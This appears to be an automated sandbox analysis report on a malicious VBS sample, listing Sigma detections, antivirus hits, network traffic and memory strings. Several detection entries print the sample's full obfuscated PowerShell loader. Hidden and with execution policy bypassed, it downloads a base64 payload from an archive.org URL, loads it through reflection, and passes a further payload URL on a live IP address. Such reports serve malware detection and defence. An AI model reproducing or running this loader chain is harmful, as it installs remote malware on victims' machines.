'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombas
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs", ProcessId: 7500, ProcessName: wscript.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombas
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs", ProcessId: 7500, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombas
              Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6Jys

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for domain / URL
              Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVirustotal: Detection: 10%Perma Link
              Source: http://107.172.148.248/130/RMOTH.txtVirustotal: Detection: 19%Perma Link
              Source: http://107.172.148.248Virustotal: Detection: 11%Perma Link
              Multi AV Scanner detection for submitted file
              Source: 0BO4n723Q8.vbsVirustotal: Detection: 9%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
              Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.11:49705 version: TLS 1.2
              Source: Binary string: ystem.pdb source: powershell.exe, 00000004.00000002.1851044596.000001C46D7E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb/tL" source: powershell.exe, 00000004.00000002.1851044596.000001C46D76C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbb source: powershell.exe, 00000004.00000002.1852407179.000001C46DA40000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000004.00000002.1851044596.000001C46D7E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: *e.pdb=p source: powershell.exe, 00000004.00000002.1819295587.000001C45383C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.1851044596.000001C46D73B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32% source: powershell.exe, 00000004.00000002.1819295587.000001C45383C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1851044596.000001C46D7E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1852407179.000001C46DA40000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb( source: powershell.exe, 00000004.00000002.1851044596.000001C46D7E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000004.00000002.1834352585.000001C4665DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1853253841.000001C46DDF0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000004.00000002.1851044596.000001C46D73B000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /130/RMOTH.txt HTTP/1.1Host: 107.172.148.248Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /130/RMOTH.txt HTTP/1.1Host: 107.172.148.248Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 207.241.227.240 207.241.227.240
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownTCP traffic detected without corresponding DNS query: 107.172.148.248
              Source: unknownTCP traffic detected without corresponding DNS query: 107.172.148.248
              Source: unknownTCP traffic detected without corresponding DNS query: 107.172.148.248
              Source: unknownTCP traffic detected without corresponding DNS query: 107.172.148.248
              Source: unknownTCP traffic detected without corresponding DNS query: 107.172.148.248
              Source: unknownTCP traffic detected without corresponding DNS query: 107.172.148.248
              Source: unknownTCP traffic detected without corresponding DNS query: 107.172.148.248
              Source: unknownTCP traffic detected without corresponding DNS query: 107.172.148.248
              Source: unknownTCP traffic detected without corresponding DNS query: 107.172.148.248
              Source: unknownTCP traffic detected without corresponding DNS query: 107.172.148.248
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /130/RMOTH.txt HTTP/1.1Host: 107.172.148.248Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /130/RMOTH.txt HTTP/1.1Host: 107.172.148.248Connection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: ia600100.us.archive.org
              Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
              Source: powershell.exe, 00000004.00000002.1819764477.000001C455A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.148.248
              Source: powershell.exe, 00000004.00000002.1819764477.000001C455BCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.148.248(
              Source: powershell.exe, 00000004.00000002.1819764477.000001C455A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.148.248/130/RMOTH.txt
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ia600100.us.archive.org
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1863528716.000001F48D367000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C4555C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.1852407179.000001C46DA61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.System.resources%20Time-Stamp%20PCA%202010(1).crl0l
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.1853033639.000001C46DAEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
              Source: powershell.exe, 00000002.00000002.1863528716.000001F48D33A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1863528716.000001F48D31B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C4555C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456735000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
